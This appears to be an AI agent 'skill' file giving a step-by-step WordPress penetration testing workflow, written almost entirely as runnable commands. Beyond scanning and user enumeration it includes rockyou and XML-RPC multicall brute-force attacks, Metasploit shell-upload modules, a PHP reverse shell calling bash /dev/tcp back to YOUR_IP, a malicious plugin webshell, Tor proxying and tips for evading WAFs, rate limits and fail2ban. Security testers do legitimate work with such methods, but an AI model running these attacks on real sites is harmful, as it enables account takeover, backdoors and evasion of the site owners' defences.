Open Skills Logo
Open Skills

WordPress Penetration Testing

This skill should be used when the user asks to "pentest WordPress sites", "scan WordPress for vulnerabilities", "enumerate WordPress users, themes, or plugins", "exploit WordPress vulnerabilities", or "use WPScan". It provides comprehensive WordPress security assessment methodologies.

View Source
name:WordPress Penetration Testingdescription:This skill should be used when the user asks to "pentest WordPress sites", "scan WordPress for vulnerabilities", "enumerate WordPress users, themes, or plugins", "exploit WordPress vulnerabilities", or "use WPScan". It provides comprehensive WordPress security assessment methodologies.metadata:author:zebbernversion:"1.1"

WordPress Penetration Testing

Purpose

Conduct comprehensive security assessments of WordPress installations including enumeration of users, themes, and plugins, vulnerability scanning, credential attacks, and exploitation techniques. WordPress powers approximately 35% of websites, making it a critical target for security testing.

Prerequisites

Required Tools


  • WPScan (pre-installed in Kali Linux)

  • Metasploit Framework

  • Burp Suite or OWASP ZAP

  • Nmap for initial discovery

  • cURL or wget

    • Required Knowledge


  • WordPress architecture and structure

  • Web application testing fundamentals

  • HTTP protocol understanding

  • Common web vulnerabilities (OWASP Top 10)

    • Outputs and Deliverables

  • WordPress Enumeration Report - Version, themes, plugins, users

  • Vulnerability Assessment - Identified CVEs and misconfigurations

  • Credential Assessment - Weak password findings

  • Exploitation Proof - Shell access documentation

    • Core Workflow

    Phase 1: WordPress Discovery

    Identify WordPress installations:

    # Check for WordPress indicators
    <div class="overflow-x-auto my-6"><table class="min-w-full divide-y divide-border border border-border"><thead><tr><th class="px-4 py-2 text-left text-sm font-semibold text-foreground bg-muted/50">curl -s http://target.com</th><th class="px-4 py-2 text-left text-sm font-semibold text-foreground bg-muted/50">grep -i wordpress</th></tr></thead><tbody class="divide-y divide-border"><tr><td class="px-4 py-2 text-sm text-foreground">curl -s http://target.com</td><td class="px-4 py-2 text-sm text-foreground">grep -i &quot;wp-includes&quot;</td></tr></tbody></table></div>
    Check common WordPress paths

    curl -I http://target.com/wp-login.php
    curl -I http://target.com/wp-admin/
    curl -I http://target.com/wp-content/
    curl -I http://target.com/xmlrpc.php
    Check meta generator tag

    curl -s http://target.com | grep "generator"
    Nmap WordPress detection

    nmap -p 80,443 --script http-wordpress-enum target.com

    Key WordPress files and directories:

  • /wp-admin/ - Admin dashboard

  • /wp-login.php - Login page

  • /wp-content/ - Themes, plugins, uploads

  • /wp-includes/ - Core files

  • /xmlrpc.php - XML-RPC interface

  • /wp-config.php - Configuration (not accessible if secure)

  • /readme.html - Version information

    • Phase 2: Basic WPScan Enumeration

    Comprehensive WordPress scanning with WPScan:

    # Basic scan
    wpscan --url http://target.com/wordpress/
    With API token (for vulnerability data)

    wpscan --url http://target.com --api-token YOUR_API_TOKEN
    Aggressive detection mode

    wpscan --url http://target.com --detection-mode aggressive
    Output to file

    wpscan --url http://target.com -o results.txt
    JSON output

    wpscan --url http://target.com -f json -o results.json
    Verbose output

    wpscan --url http://target.com -v

    Phase 3: WordPress Version Detection

    Identify WordPress version:

    # WPScan version detection
    wpscan --url http://target.com
    Manual version checks

    <div class="overflow-x-auto my-6"><table class="min-w-full divide-y divide-border border border-border"><thead><tr><th class="px-4 py-2 text-left text-sm font-semibold text-foreground bg-muted/50">curl -s http://target.com/readme.html</th><th class="px-4 py-2 text-left text-sm font-semibold text-foreground bg-muted/50">grep -i version</th></tr></thead><tbody class="divide-y divide-border"><tr><td class="px-4 py-2 text-sm text-foreground">curl -s http://target.com</td><td class="px-4 py-2 text-sm text-foreground">grep &quot;?ver=&quot;</td></tr></tbody></table></div>
    Check meta generator

    curl -s http://target.com | grep 'name="generator"'
    Check RSS feeds

    curl -s http://target.com/feed/
    curl -s http://target.com/comments/feed/

    Version sources:

  • Meta generator tag in HTML

  • readme.html file

  • RSS/Atom feeds

  • JavaScript/CSS file versions

    • Phase 4: Theme Enumeration

    Identify installed themes:

    # Enumerate all themes
    wpscan --url http://target.com -e at
    Enumerate vulnerable themes only

    wpscan --url http://target.com -e vt
    Theme enumeration with detection mode

    wpscan --url http://target.com -e at --plugins-detection aggressive
    Manual theme detection

    curl -s http://target.com | grep "wp-content/themes/"
    curl -s http://target.com/wp-content/themes/

    Theme vulnerability checks:

    # Search for theme exploits
    searchsploit wordpress theme <theme_name>
    Check theme version

    curl -s http://target.com/wp-content/themes/<theme>/style.css | grep -i version
    curl -s http://target.com/wp-content/themes/<theme>/readme.txt

    Phase 5: Plugin Enumeration

    Identify installed plugins:

    # Enumerate all plugins
    wpscan --url http://target.com -e ap
    Enumerate vulnerable plugins only

    wpscan --url http://target.com -e vp
    Aggressive plugin detection

    wpscan --url http://target.com -e ap --plugins-detection aggressive
    Mixed detection mode

    wpscan --url http://target.com -e ap --plugins-detection mixed
    Manual plugin discovery

    curl -s http://target.com | grep "wp-content/plugins/"
    curl -s http://target.com/wp-content/plugins/

    Common vulnerable plugins to check:

    # Search for plugin exploits
    searchsploit wordpress plugin <plugin_name>
    searchsploit wordpress mail-masta
    searchsploit wordpress slideshow gallery
    searchsploit wordpress reflex gallery
    Check plugin version

    curl -s http://target.com/wp-content/plugins/<plugin>/readme.txt

    Phase 6: User Enumeration

    Discover WordPress users:

    # WPScan user enumeration
    wpscan --url http://target.com -e u
    Enumerate specific number of users

    wpscan --url http://target.com -e u1-100
    Author ID enumeration (manual)

    for i in {1..20}; do
        curl -s "http://target.com/?author=$i" | grep -o 'author/[^/]/'
    done
    JSON API user enumeration (if enabled)

    curl -s http://target.com/wp-json/wp/v2/users
    REST API user enumeration

    curl -s http://target.com/wp-json/wp/v2/users?per_page=100
    Login error enumeration

    curl -X POST -d "log=admin&pwd=wrongpass" http://target.com/wp-login.php

    Phase 7: Comprehensive Enumeration

    Run all enumeration modules:

    # Enumerate everything
    wpscan --url http://target.com -e at -e ap -e u
    Alternative comprehensive scan

    wpscan --url http://target.com -e vp,vt,u,cb,dbe
    Enumeration flags:

    at - All themes

    vt - Vulnerable themes

    ap - All plugins

    vp - Vulnerable plugins

    u  - Users (1-10)

    cb - Config backups

    dbe - Database exports
    Full aggressive enumeration

    wpscan --url http://target.com -e at,ap,u,cb,dbe \
        --detection-mode aggressive \
        --plugins-detection aggressive

    Phase 8: Password Attacks

    Brute-force WordPress credentials:

    # Single user brute-force
    wpscan --url http://target.com -U admin -P /usr/share/wordlists/rockyou.txt
    Multiple users from file

    wpscan --url http://target.com -U users.txt -P /usr/share/wordlists/rockyou.txt
    With password attack threads

    wpscan --url http://target.com -U admin -P passwords.txt --password-attack wp-login -t 50
    XML-RPC brute-force (faster, may bypass protection)

    wpscan --url http://target.com -U admin -P passwords.txt --password-attack xmlrpc
    Brute-force with API limiting

    wpscan --url http://target.com -U admin -P passwords.txt --throttle 500
    Create targeted wordlist

    cewl http://target.com -w wordlist.txt
    wpscan --url http://target.com -U admin -P wordlist.txt

    Password attack methods:

  • wp-login - Standard login form

  • xmlrpc - XML-RPC multicall (faster)

  • xmlrpc-multicall - Multiple passwords per request

    • Phase 9: Vulnerability Exploitation

    Metasploit Shell Upload

    After obtaining credentials:

    # Start Metasploit
    msfconsole
    Admin shell upload

    use exploit/unix/webapp/wp_admin_shell_upload
    set RHOSTS target.com
    set USERNAME admin
    set PASSWORD jessica
    set TARGETURI /wordpress
    set LHOST <your_ip>
    exploit

    Plugin Exploitation

    # Slideshow Gallery exploit
    use exploit/unix/webapp/wp_slideshowgallery_upload
    set RHOSTS target.com
    set TARGETURI /wordpress
    set USERNAME admin
    set PASSWORD jessica
    set LHOST <your_ip>
    exploit
    Search for WordPress exploits

    search type:exploit platform:php wordpress

    Manual Exploitation

    Theme/plugin editor (with admin access):

    // Navigate to Appearance > Theme Editor
    // Edit 404.php or functions.php
    // Add PHP reverse shell:
    <?php
    exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");
    ?>
    // Or use weevely backdoor
    // Access via: http://target.com/wp-content/themes/theme_name/404.php

    Plugin upload method:

    # Create malicious plugin
    cat > malicious.php << 'EOF'
    <?php
    /
    Plugin Name: Malicious Plugin
    Description: Security Testing
    Version: 1.0
    */
    if(isset($_GET['cmd'])){
        system($_GET['cmd']);
    }
    ?>
    EOF
    Zip and upload via Plugins > Add New > Upload Plugin

    zip malicious.zip malicious.php
    Access webshell

    curl "http://target.com/wp-content/plugins/malicious/malicious.php?cmd=id"

    Phase 10: Advanced Techniques

    XML-RPC Exploitation

    # Check if XML-RPC is enabled
    curl -X POST http://target.com/xmlrpc.php
    List available methods

    curl -X POST -d '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>' http://target.com/xmlrpc.php
    Brute-force via XML-RPC multicall

    cat > xmlrpc_brute.xml << 'EOF'
    <?xml version="1.0"?>
    <methodCall>
    <methodName>system.multicall</methodName>
    <params>
    <param><value><array><data>
    <value><struct>
    <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
    <member><name>params</name><value><array><data>
    <value><string>admin</string></value>
    <value><string>password1</string></value>
    </data></array></value></member>
    </struct></value>
    <value><struct>
    <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
    <member><name>params</name><value><array><data>
    <value><string>admin</string></value>
    <value><string>password2</string></value>
    </data></array></value></member>
    </struct></value>
    </data></array></value></param>
    </params>
    </methodCall>
    EOF
    curl -X POST -d @xmlrpc_brute.xml http://target.com/xmlrpc.php

    Scanning Through Proxy

    # Use Tor proxy
    wpscan --url http://target.com --proxy socks5://127.0.0.1:9050
    HTTP proxy

    wpscan --url http://target.com --proxy http://127.0.0.1:8080
    Burp Suite proxy

    wpscan --url http://target.com --proxy http://127.0.0.1:8080 --disable-tls-checks

    HTTP Authentication

    # Basic authentication
    wpscan --url http://target.com --http-auth admin:password
    Force SSL/TLS

    wpscan --url https://target.com --disable-tls-checks

    Quick Reference

    WPScan Enumeration Flags

    FlagDescription
    -e atAll themes
    -e vtVulnerable themes
    -e apAll plugins
    -e vpVulnerable plugins
    -e uUsers (1-10)
    -e cbConfig backups
    -e dbeDatabase exports

    Common WordPress Paths

    PathPurpose
    /wp-admin/Admin dashboard
    /wp-login.phpLogin page
    /wp-content/uploads/User uploads
    /wp-includes/Core files
    /xmlrpc.phpXML-RPC API
    /wp-json/REST API

    WPScan Command Examples

    PurposeCommand
    Basic scanwpscan --url http://target.com
    All enumerationwpscan --url http://target.com -e at,ap,u
    Password attackwpscan --url http://target.com -U admin -P pass.txt
    Aggressivewpscan --url http://target.com --detection-mode aggressive

    Constraints and Limitations

    Legal Considerations


  • Obtain written authorization before testing

  • Stay within defined scope

  • Document all testing activities

  • Follow responsible disclosure

    • Technical Limitations


  • WAF may block scanning

  • Rate limiting may prevent brute-force

  • Some plugins may have false negatives

  • XML-RPC may be disabled

    • Detection Evasion


  • Use random user agents: --random-user-agent

  • Throttle requests: --throttle 1000

  • Use proxy rotation

  • Avoid aggressive modes on monitored sites

    • Troubleshooting

    WPScan Shows No Vulnerabilities

    Solutions:

  • Use API token for vulnerability database

  • Try aggressive detection mode

  • Check for WAF blocking scans

  • Verify WordPress is actually installed

    • Brute-Force Blocked

    Solutions:

  • Use XML-RPC method instead of wp-login

  • Add throttling: --throttle 500

  • Use different user agents

  • Check for IP blocking/fail2ban

    • Cannot Access Admin Panel

    Solutions:

  • Verify credentials are correct

  • Check for two-factor authentication

  • Look for IP whitelist restrictions

  • Check for login URL changes (security plugins)